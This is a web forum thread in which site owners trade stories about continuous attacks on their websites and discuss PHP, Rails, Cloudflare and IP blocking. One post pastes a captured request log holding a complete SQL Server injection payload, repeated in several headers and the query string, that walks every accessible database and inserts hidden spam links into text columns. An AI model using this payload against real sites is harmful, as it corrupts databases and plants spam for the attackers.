Are anyone else's websites under attack?

[motion]

My websites are under attack on and off continuously. Mostly SQL injection stuff. I invested heavily in defenses, and its paid off, but wow, it just seems like it never lets up. About 3 1/2 years ago I was attacked by Iranians, bringing down many of my sites. That episode cost me a couple hundred thousand dollars. Sometimes I go a couple weeks without much activity, then its thousands of attacks over a few days, then it goes quiet again. Please make me feel better and tell me I'm not the only one

[rwest]

They only attack the best and coolest sites!

[masraum]

Nope, I'd say that's pretty usual. Good job and congrats on getting your stuff pretty well protected.

[stevej37]

My computer was under attack from a virus a while back. Had a local guy fix it...cost me $40

[stealthn]

Constant and persistant threats are the new black...

[billybek]

Ransomware seems to be the big thing right now.

[JD159]

SQL injection? What language is the website written in??

[Holger]

I am running a site/forum on redundant servers located at the company who is also hosting IKEAs sites among other.

My server admin told me the server farm is under constant pressure from the outside. It is like a flood-wall holding back the attackers 24/7. If some minor percentage comes through whole arrays will go down.

So no, you are not the only one.

[Brando]

My WordPress sites seem to be constantly under assault. If they can't get through they move on.

[stomachmonkey]

Don't look at your security logs if you ever want to sleep again.

I stopped looking at them a decade ago.

I've had a few clients that have freaked out and tried to go nuclear over a single minor breach attempt until I show them the live logs and they realize this stuff is happening 24/7/365.

It just never ever ends.

Last month I fired up a cloud instance that I needed to run Windows on.

Damn thing got compromised in the first 5 minutes before I could even finish hardening it.

Most of my stuff runs off Linode these days.

One of the advantages is being able to keep multiple distinct public IP's for an instance and swap a clean one in if the primary is being abused.

Does not help if they are coming after you based on FQDN though.

Which reminds me, I need to run something by you.

Been in DC for 3 days, in NJ now and will be in NYC next few days but when I get back I'd appreciate a few minutes of your time if you don't mind.

[stomachmonkey]

Quote:

Originally Posted by JD159

SQL injection? What language is the website written in??

Probably like 90% of everything dynamic these days, HTML5, CSS, PHP, jquery, and SQL on the backend.

[JD159]

Just managed a project built in Ruby on Rails for the backend and React on the front-end. Chose Rails because I really don't like the inconsistent skill levels with PHP development. Whereas with rails if you follow the conventions it is pretty secure, just harder to find a developer.

PHP developers are a dime a dozen and many won't follow proper conventions. As a language it is getting kinda messy for some web applications. If your project has outsourced PHP, usually the code is the reason for the website being brought down. Ask me how I know!

I develop myself in HTML, CSS and jQuery, but am not versed in PHP or SQL, aside from holding together a "legacy" program. I had a new developer start a project in PHP and saw where it was going and how messy/vulnerable the structure was and cancelled. That was when I began looking for Rails.

What's your thoughts on Rails as a backend stomachmonkey? PS. Used postgres for the database on my new program.

[motion]

Quote:

Originally Posted by stomachmonkey

Which reminds me, I need to run something by you.

Been in DC for 3 days, in NJ now and will be in NYC next few days but when I get back I'd appreciate a few minutes of your time if you don't mind.

As long as you don't ask me anything technical

[pwd72s]

Quote:

Originally Posted by billybek

Ransomware seems to be the big thing right now.

When the IT guys here start with their jargon, I get instantly lost. Ransomware? Just got a notice from the security service we use giving us a number to call if we get hit with it. Evidently, they've come up with a way to get rid of that form of attack.

Prior to that, I always figured it would be cheaper for me to just buy another computer & start over. Nothing of that much value in our computer anyway. Never posted a credit card number, social security numbers, etc. Still do our finances the old fashioned way...paper.

Anybody ever read the O. Henry story titled "Ransom of Red Chief"? Two bums who kidnapped a rich man's son? I always thought that's kind of how I would handle it if hit with ransomware. With no reward, they'd quit picking on me?

[motion]

Appreciate the responses. I guess I'm not the only one, which makes ma feel a lot better. Wonder if this situation will get better or worse over time? Seems ridiculous to me.

FWIW, here is a report on one of the attacks from yesterday (one of thousands). I have no idea what this means, but just throwing it out there. I do see "cialis" in the Query String, so I'm assuming its an attempted server hijack for mass spam emailing.

HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_ENCODING:gzip,deflate,gzip, deflate HTTP_HOST:xxxxxxxx.com HTTP_REFERER:http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

ALL_RAW Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,gzip, deflate Host: xxxxxxxx.com Referer: http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

QUERY_STRING minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20cursor;declare%20@s%20varchar (8000);declare%20@w%20varchar(99);set%20@b=cursor% 20for%20select%20DB_NAME()%20union%20select%20name %20from%20sys.databases%20where%20(has_dbaccess(na me)!=0)%20and%20name%20not%20in%20('master','tempd b','model','msdb',DB_NAME());open%20@b;fetch%20nex t%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0 %20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B ';declare%20@c%20cursor;declare%20@d%20varchar(400 0);set%20@c=cursor%20for%20select%20''update%20%5B ''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAM E%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS (CHECKSUM(NewId()))%2510%20when%200%20then%20''''' '%2Bchar(60)%2B''div%20style=%22display:none%22''% 2Bchar(62)%2B''cialis%20coupon%20''%2Bchar(60)%2B' 'a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www .cartoninjas.net''%2Bchar(47)%2B''page''%2Bchar(47 )%2B''Drug-Prescription-Card%22%20rel=%22nofollow%22''%2Bchar(62)%2B'''''' %2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20 then%20''''cialis%20coupon''''%20when%201%20then%2 0''''cialis%20coupon''''%20else%20''''cialis%20cou pon''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B ''a''%2Bchar(62)%2B''%20cialis%20coupon''%2Bchar(6 0)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else %20''''''''%20end''%20FROM%20sysindexes%20AS%20i%2 0INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o. id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20O N%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))% 20and%20DATA_TYPE%20like%20''%25varchar''%20and(CH ARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d ;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fe tch%20next%20from%20@c%20into%20@d;end;close%20@c% 20end%20try%20begin%20catch%20end%20catch';exec%20 (@s);fetch%20next%20from%20@b%20into%20@w;end;clos e%20@b--&city=

HTTP_REFERER http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

[stomachmonkey]

I'm assuming this site has some search function?

On my phone so a bit hard to read but it looks like it's trying to grab all you database tables.

Why could be a variety of things.

[stomachmonkey]

Quote:

Originally Posted by motion

As long as you don't ask me anything technical

Got that part covered, more a viability thing.

[stomachmonkey]

Quote:

Originally Posted by JD159

Just managed a project built in Ruby on Rails for the backend and React on the front-end. Chose Rails because I really don't like the inconsistent skill levels with PHP development. Whereas with rails if you follow the conventions it is pretty secure, just harder to find a developer.

PHP developers are a dime a dozen and many won't follow proper conventions. As a language it is getting kinda messy for some web applications. If your project has outsourced PHP, usually the code is the reason for the website being brought down. Ask me how I know!

I develop myself in HTML, CSS and jQuery, but am not versed in PHP or SQL, aside from holding together a "legacy" program. I had a new developer start a project in PHP and saw where it was going and how messy/vulnerable the structure was and cancelled. That was when I began looking for Rails.

What's your thoughts on Rails as a backend stomachmonkey? PS. Used postgres for the database on my new program.

I actually prefer PHP primarily since it's so easy to find people.

I only have two guys I work with when it "matters".

I'm less concerned with the language, it's "the guy" that matters.

But we also do a lot of hand off work. Meaning build it for the client then they take it over. That kind of dictates to some degree what is used to build their solution. We don't like doing maintenance stuff.

I also hate being held hostage by proprietary solutions that keep me tied to certain individuals / groups and take that approach with clients. They are more than welcome to retain us long term but the choice is theirs and the work is done in a way that leaves the choice up to them.

[Brando]

What's the consensus on using Cloud Flare as a proxy/screen for these types of attacks?

[beepbeep]

Long time ago, when I bothered running my own servers, I had to block whole ranges of Chinese and Russian IP addresses. While it didn't take out all attacks, it surely removed 90% of traffic.